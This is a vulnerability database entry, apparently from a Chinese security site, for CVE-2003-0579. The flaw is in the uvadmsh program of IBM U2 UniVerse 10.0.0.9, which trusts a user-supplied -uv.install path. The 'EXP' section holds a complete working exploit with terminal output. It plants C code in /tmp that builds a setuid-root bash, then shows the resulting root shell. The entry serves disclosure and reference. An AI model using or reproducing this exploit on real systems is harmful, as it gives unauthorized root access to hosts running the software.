IBM U2 UniVerse获取特权漏洞

IBM U2 UniVerse获取特权漏洞

漏洞ID 1107418 漏洞类型 未知
发布时间 2003-07-16 更新时间 2003-08-18
图片[1]-IBM U2 UniVerse获取特权漏洞-安全小百科CVE编号 CVE-2003-0579
图片[2]-IBM U2 UniVerse获取特权漏洞-安全小百科CNNVD-ID CNNVD-200308-051
漏洞平台 Unix CVSS评分 4.6
|漏洞来源
https://www.exploit-db.com/exploits/22912
https://www.securityfocus.com/bid/87444
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200308-051
|漏洞详情
IBMU2UniVerse10.0.0.9及其早期版本的uvadmsh信任user-supplied-uv.install命令行选项从而查找且执行uv.install程序,本地用户通过提供用户控制下的路径名获取特权。
|漏洞EXP
source: http://www.securityfocus.com/bid/8203/info

A vulnerability has been reported in the IBM U2 UniVerse uvadmsh program that could permit the uvadm user to execute arbitrary code with elevated privileges. The -uv.install option of the vulnerable program allows a user to specify an arbitrary path to a file. In cases where uvadmsh is installed setuid root, this could be abused to run an executable file of the attacker's choosing.

While this vulnerability was reported in UniVerse version 10.0.0.9, previous versions are likely vulnerable as well. 

[uvadm@vegeta uvadm]$ cat > /tmp/uv.install.c
main()
{
setuid(0);
system("cc -o /tmp/owned /tmp/owned.c");
system("chmod 4755 /tmp/owned");
}

[uvadm@vegeta uvadm]$ cc -o /tmp/uv.install /tmp/uv.install.c
[uvadm@vegeta uvadm]$ cat > /tmp/owned.c
main()
{
setuid(0);
system("/bin/bash");
}

[uvadm@vegeta uvadm]$ ls -al /tmp/owned
ls: /tmp/owned: No such file or directory

[uvadm@vegeta uvadm]$ /usr/ibm/uv/bin/uvadmsh -uv.install /tmp
[uvadm@vegeta uvadm]$ ls -al /tmp/owned
-rwsr-xr-x 1 root uvadm 11640 Jul 2 20:15 /tmp/owned

[uvadm@vegeta uvadm]$ /tmp/owned
[root@vegeta uvadm]# id
uid=0(root) gid=503(uvadm) groups=503(uvadm)
|参考资料

来源:VULNWATCH
名称:20030716SRT2003-07-07-0833-IBMU2UniVerseuserswithuvadmrightscantakerootviauvadmsh
链接:http://archives.neohapsis.com/archives/vulnwatch/2003-q3/0026.html
来源:BUGTRAQ
名称:20030716SRT2003-07-07-0833-IBMU2UniVerseuserswithuvadmrightscantakerootviauvadmsh
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=105838948002337&w;=2

相关推荐: Pablo Software Solutions FTP Service 1.2 – Anonymous Users Privileges

Pablo Software Solutions FTP Service 1.2 – Anonymous Users Privileges 漏洞ID 1053927 漏洞类型 发布时间 2003-06-03 更新时间 2003-06-03 CVE编号 N/A …

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享